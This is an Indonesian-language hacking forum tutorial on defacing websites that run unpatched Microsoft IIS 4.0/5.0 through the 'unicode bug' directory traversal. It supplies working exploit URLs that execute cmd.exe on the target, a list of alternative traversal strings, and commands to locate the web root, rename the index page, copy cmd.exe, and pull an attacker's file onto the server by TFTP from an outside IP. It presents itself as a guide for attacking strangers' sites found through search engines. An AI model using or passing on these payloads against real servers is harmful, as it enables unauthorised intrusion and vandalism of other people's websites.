Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo anda adalah web master dan anda ngerubah tampilan halaman situs yang anda punya tentu saja itu nggak bisa disebut deface….
Proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kalian ketahui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbeda apabila kita ingin melakukan deface diantara kedua OS tsb. Operating System atau OS biasanya kalo kita kelompikin ke 2 keluarga besar,yaitu :
1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)
Mengenai cara men-deface website yang menggunakan Microsoft Internet Information Server atau Microsoft IIS. Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan “unicode bug”. Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser. Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll) key nya terserah, lalu utk mengetahui site itu menggunakan MS IIS 4.0/5.0 , kita scan terlebih dahulu di http://www.netcraft.com.setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ,langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengetahui cara scan lewat mirc ,coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/…. or memakai cara manual yg lebih sering kita gunakan:
http://wwwtargethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Pertama : Muncul pesan ERROR
Kedua : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka http://www.targethost.com tadi ada kemungkinan untuk bisa kita deface…
Mari kita perhatikan URL diatas. URL diatas akan dibagi menjadi empat bagian yaitu :
• Bagian host, yaitu “http://www.targethost.com”
• Bagian exploit string, yaitu “/scripts/..%255c..%255c”
• Bagian folder, yaitu “/winnt/system32/”
• Bagian command, yaitu “cmd.exe?/c+dir+c:\”
Kita lihat pada bagian command diatas menunjukkan perintah “dir c:\” yang berarti melihat seluruh file-file yang berada pada root drive C. Anda bisa mencoba perintah yang lain seperti “dir d:\” atau yang lain. Ingat, anda harus mengganti karakter spasi dengan tanda “+”. Anda bahkan bisa mengetahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah “ipconfig.exe /all”
Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada browser anda. Untuk itu anda ganti sajah bagian eksploit stringnyah, eksploit string yg sering tembus adalah :
– /cgi-bin/..%255c..%255c
– /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
– /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
– /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
– /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
– /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
– /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
– /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
– /scripts/..%255c..%255c
Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser anda maka kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE anda yg lagi ddos). Dan anda bisa memilih situs lain sebagai sasaran. Lanjut seandainya udah dapet site yg bug unicodenyahgak di patch.. Langkah berikutnya adalah mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.
Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau D:\InetPub\wwwroot.
Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya ,anda cukup mengetikkan URL seperti di bawah ini
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set
URL diatas akan menampilkan daftar environment variable dari web server sasaran. Tugas anda sekarang adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah, jika tidak ketemu coba refresh lagi. Sekarang kita DIR PATH_TRANSLATED nya. Kita ambil contoh PATH_TRANSLATEDnya : C:\InetPub\wwwroot…. Perintahnya ng-DIR nyah : http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot. Jika sudah terbuka dokumennya,dan telah ter-DIR PATH_TRANSLATEDnya lalu kita cari dokumen web itu dan kita RENAME. Gimana kalau misalnya dokumen2 web yg kita curigain itu ada 3, coba sekarang anda buka site aslinya di lain window, http://www.targethost.com == di http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot dokumen2 web nya ada 3 macam pasti kita bingung yg mana yg mau di RENAME misalnya : di http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada : Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html
Udah di buka kan site aslinya nah coba masukan salah satu dokumen web itu di site asli nya… contoh : http://www.targethost.com/default.htm kita liat hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadi ternyata sama gambarnya. Nah skrg kita RENAME yg main html itu. Perintahnya :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html
Lihat apa yg terjadi di IE kita CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access is denied
Gagal disini, namun cari lagi target lain
Dapat target baru langsung di RENAME aja. Hasilnya setelah di RENAME seperti di bawah ini :
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
Nah kalau seperti diatas anda telah merubah or berhasil men-deface halaman depan web site tersebut,buktikan dengan mencoba buka site aslinya dan hasilnya pasti ERROR (Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk langkah selanjutnya*)
Sekarang anda upload file anda ke site tadi..` Pertama lewat ECHO..Kedua lewat TFTP32.
*Cara pertama :*
Utk meng-upload file lewat echo sebelumnya kita harus mengcopy file cmd.exe pada direktori C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL berikut :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\cmdku.exe
Pasti hasilnya akan seperti di bawah ini :
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
1 file(s) copied.
Tujuan kita meng-copy cmd.exe menjadi cmdku.exe adalah agar kita bisa menjalankan perintah echo dengan lengkap. Apabila Anda menggunakan cmd.exe maka perintah echo tidak bisa digunakan untuk menulis atau membuat file.
Okeih Sob skrg mari kita up-load file nya lewat perintah echo perintahnya :
dapat dilihat disini
Kita liat apa yg terjadi di IE kita.
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
Selamat anda telah berhasil meng-upload file anda lewat cara echo tadi silahkan buka web site target tadi.
Saya akan membagi URL tadi menjadi empat bagian :
• Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c
• Bagian command yaitu, cmdku.exe?/c+echo+
• Bagian HTML
• Bagian PATH_TRANSLATEDnyah(rootnyah)+Dokumen webnyah yaitu,
C:\InetPub\wwwroot\main.html
Cara Kedua Utk meng-upload file lewat TFTP32 sebelumnya anda harus mendownload software TFTP32 terlebih dahulu di http://www.download.com ketik keynya TFTP32 dan anda harus main diserver (sebab di user pasti tidak bisa). Meng-upload file lewat TFTP32.. anda tdk perlu mengcopy cmd.exe nya langsung aja.
Perintah Meng-uploadnya :
•http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau anda
up-load)+ C:\InetPub\wwwroot\main.html
Kita liat lagi apa yg terjadi di IE kita.
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
Anda telah berhasil meng-upload file anda memakai software TFTP32 tadi silahkan buka web site target tadi.
Saya akan uraikan juga URL tadi menjadi 4 bagian :
• Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c
• Bagian folder, yaitu /winnt/system32/
• Bagian command, yaitu cmd.exe?/c+tftp+-i+202.95.145.71(IPmu)+get+antique.htm(file yg mau koe up-load)+
• Bagian PATH_TRANSLATEDNYAH(rootnyah)+Dokumen webnyah yaitu,
C:\InetPub\wwwroot\main.htm
Kekurangannya dalam meng-upload file lewat TFTP32terkadang suatu server (web site) tidak mau menerima up-load file kita tadi. Jika itu terjadi maka gunakanlah cara pertama diatas.
Sumber: http://hacker01.indonesianforum.net/t9-teknik-deface-server-ms-iis-by-codenesia